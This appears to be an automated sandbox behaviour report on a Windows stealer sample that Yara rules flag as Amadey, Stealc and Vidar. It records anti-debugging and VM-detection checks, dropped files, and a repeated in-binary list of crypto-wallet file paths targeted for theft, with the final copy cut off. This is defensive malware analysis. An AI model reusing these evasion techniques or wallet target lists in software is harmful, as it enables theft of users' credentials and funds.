Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1012962001\931e3b56d4.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 7644	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7620	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7620	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7616	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7616	Thread sleep time: -86043s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7720	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7624	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7624	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7640	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6052	Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6052	Thread sleep time: -1590000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6052	Thread sleep time: -30000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\JDGIECGIEB.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB4EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6CB4EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000012.00000002.2063321615.000000000079B000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000014.00000002.2645365146.000000000079B000.00000040.00000001.01000000.0000000E.sdmp, file.exe	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: BGCAFHCA.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: BGCAFHCA.0.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: file.exe, 00000000.00000002.1979370069.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:cuI
Source: BGCAFHCA.0.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: BGCAFHCA.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: BGCAFHCA.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: BGCAFHCA.0.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000003.1743257678.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2647162838.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2647162838.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BGCAFHCA.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: BGCAFHCA.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: BGCAFHCA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: BGCAFHCA.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: BGCAFHCA.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: BGCAFHCA.0.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: file.exe, 00000000.00000002.1978262092.0000000000611000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: iMSHN6QKQEMUh;=a
Source: BGCAFHCA.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: file.exe, 00000000.00000002.1978262092.0000000000611000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: MSHN6QKQEMU
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: BGCAFHCA.0.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: BGCAFHCA.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: BGCAFHCA.0.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: BGCAFHCA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: BGCAFHCA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: file.exe	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: BGCAFHCA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Documents\JDGIECGIEB.exe

Code function: 16_2_04B20D06 Start: 04B20D57 End: 04B20D51

16_2_04B20D06

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Documents\JDGIECGIEB.exe

Code function: 16_2_04B20CA1 rdtsc

16_2_04B20CA1

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC1AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CC1AC62

Contains functionality to read the PEB

Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_0018652B mov eax, dword ptr fs:[00000030h]	16_2_0018652B
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_0018A302 mov eax, dword ptr fs:[00000030h]	16_2_0018A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005EA302 mov eax, dword ptr fs:[00000030h]	17_2_005EA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005E652B mov eax, dword ptr fs:[00000030h]	17_2_005E652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005EA302 mov eax, dword ptr fs:[00000030h]	18_2_005EA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005E652B mov eax, dword ptr fs:[00000030h]	18_2_005E652B

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC1AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CC1AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JDGIECGIEB.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\JDGIECGIEB.exe "C:\Users\user\Documents\JDGIECGIEB.exe"	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC64760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6CC64760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB41C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6CB41C30

Source: file.exe, file.exe, 00000000.00000002.1978921655.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 00000012.00000002.2063786095.00000000007DC000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000014.00000002.2645875194.00000000007DC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: (Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC1AE71 cpuid

0_2_6CC1AE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC1A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CC1A8DC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB68390 NSS_GetVersion,

0_2_6CB68390

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 18.2.skotes.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.skotes.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.skotes.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.JDGIECGIEB.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2062939332.00000000005B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2050408210.00000000005B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2019078074.0000000000151000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2644831254.00000000005B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1978262092.0000000000611000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local 